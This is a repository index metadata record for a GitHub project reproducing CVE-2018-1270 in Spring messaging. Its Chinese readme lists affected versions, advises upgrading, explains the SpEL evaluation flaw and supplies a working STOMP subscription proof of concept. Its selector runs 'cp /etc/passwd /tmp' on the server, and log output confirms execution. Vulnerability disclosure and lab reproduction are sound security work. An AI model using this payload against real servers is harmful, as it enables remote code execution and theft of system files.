{"id":13841372,"url":"https://github.com/CaledoniaProject/CVE-2018-1270","last_synced_at":"2025-07-11T12:31:37.773Z","repository":{"id":146440860,"uuid":"128482458","full_name":"CaledoniaProject/CVE-2018-1270","owner":"CaledoniaProject","description":"Spring messaging STOMP protocol RCE","archived":true,"fork":false,"pushed_at":"2018-04-12T05:48:24.000Z","size":474,"stargazers_count":114,"open_issues_count":0,"forks_count":24,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-08-05T17:27:22.354Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CaledoniaProject.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-04-07T00:14:33.000Z","updated_at":"2024-08-05T15:30:38.000Z","dependencies_parsed_at":"2023-03-30T11:07:12.850Z","dependency_job_id":null,"html_url":"https://github.com/CaledoniaProject/CVE-2018-1270","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2FCVE-2018-1270","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2FCVE-2018-1270/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2FCVE-2018-1270/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2FCVE-2018-1270/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CaledoniaProject","download_url":"https://codeload.github.com/CaledoniaProject/CVE-2018-1270/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225720402,"owners_count":17513597,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:09.550Z","updated_at":"2024-11-21T11:30:43.920Z","avatar_url":"https://github.com/CaledoniaProject.png","language":"Java","funding_links":[],"categories":["Java","Java (504)"],"sub_categories":[],"readme":"# CVE-2018-1270 - Spring messaging Spel 代码执行漏洞\n\n昨天 Spring 公布了1个RCE漏洞，了解一下:\n\n* [CVE-2018-1270: Remote Code Execution with spring-messaging](https://pivotal.io/security/cve-2018-1270)\n\n影响版本\n\n* Spring Framework 5.0 to 5.0.4\n* Spring Framework 4.3 to 4.3.14\n\n这个漏洞对环境没有要求，如果你在使用 `spring-messaging + websocket + STOMP`，请尽快升级到最新版本；如果你在用 SpringBoot，请升级到 `2.0.1.RELEASE`。\n\n### 漏洞详情\n\n简单说，由于 `StandardEvaluationContext` 权限太大，可以执行任意 SpEL 表达式，所以官方在 `Spring 5.0.5` 之后添加了 `SimpleEvaluationContext`，用于实现简单的数据绑定，保持灵活性但不带来安全隐患。\n\nspring-messaging 提供了 STOMP 协议支持，允许客户端订阅消息，并使用 selector 去过滤消息，e.g\n\n```\nselector = 'T(java.lang.Runtime).getRuntime().exec(\"cp /etc/passwd /tmp\")'\nstompClient = Stomp.client('ws://localhost:8080/hello')\nstompClient.connect({}, function(frame) {\n    stompClient.subscribe('/topic/greetings', function() {}, {\n        \"selector\": selector\n    })\n});\n```\n\n当你在订阅时，spring 会存储这个过滤器，并在客户端收到消息时触发，e.g\n\n```\n2018-04-07 08:32:20 [clientInboundChannel-3] TRACE o.s.m.s.b.DefaultSubscriptionRegistry - Subscription selector: [T(java.lang.Runtime).getRuntime().exec(\"cp /etc/passwd /tmp\")]\n\n...\n\n2018-04-07 08:32:21 [MessageBroker-2] DEBUG o.s.m.s.b.DefaultSubscriptionRegistry - Failed to evaluate selector: EL1001E: Type conversion problem, cannot convert from java.lang.UNIXProcess to boolean\n```\n\nPoc 截屏\n\n![screenshot](contrib/screenshot.jpg)\n\n具体漏洞分析文章，稍后发出\n\n### 环境使用方法\n\n编译并启动 Spring Boot 服务器，\n\n```\nmvn clean package\njava -jar target/spring-boot-websocket-1.0.jar\n```\n\n访问 - 输入表达式进行测试，\n\n```\nhttp://localhost:8080\n```\n\n![screenshot](contrib/web.jpg)\n\n\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FCaledoniaProject%2FCVE-2018-1270","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FCaledoniaProject%2FCVE-2018-1270","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FCaledoniaProject%2FCVE-2018-1270/lists"}